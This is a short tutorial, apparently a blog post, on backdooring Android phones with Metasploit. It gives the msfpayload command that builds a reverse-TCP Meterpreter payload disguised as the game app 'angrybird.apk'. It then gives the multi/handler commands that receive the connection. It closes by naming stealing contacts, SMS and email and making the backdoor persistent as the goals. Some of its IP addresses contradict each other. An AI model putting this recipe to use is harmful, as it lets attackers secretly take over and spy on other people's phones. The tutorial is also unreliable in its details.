HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS

INTRODUCTION

Metasploit is an open source penetration testing tool with different functionality. Metasploit project provides information about security vulnerabilities useful in penetration testing, develop and exploit remote machines and IPS/IDS signature development.

Note: In this Tutorial I Use my gionee m2. This backdoor will work on all

android OS's irrespective of its customisation.

SETUP INFORMATION

192.168.0.3 victim ip Address(Gionee m2)

19.168.0.5 Attackers ip Address(Metasploit)

As it is a demo I am using google drive to download the metasploit backdoor(malicious App).

CREATE BACKDOOR Using kali linux with metasploit framework install to generate the payload.

• msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk

msfpayload metasploit command to create payload(exe,apk,java etc) LHOST (local host) Attakers ip Address for victim to connect back LPORT (local port)port for victim to connect back R msfpayload parameter indicates generation of raw payload

successful execution of msfpayload will create angrybird.apk app which is a metasploit reverse tcp backdoor. When the app is installed on any android device,it will connect back to attackers ip address(192.169.0.5 here). Before installing the app on your device attacker need to run the following metasploit commands for succesful connection back to victim's machine to attacker's machine.

• msfconsole

• use exploit/multi/handler

• set payload android/meterpreter/reverse_tcp

• set LHOST <attackers_ip_address>

• set LPORT <connect_back_port>

• exploit

when the malicious apk running on target device the metasploit's meterpreter shell open. For meterpreter command help type 'help' on meterpreter prompt.

Once the user is compromised we can accelerate our privileges,make the backdoor persistent,steal contacts,SMS,email etc.

THANX FOR YOUR PATIENT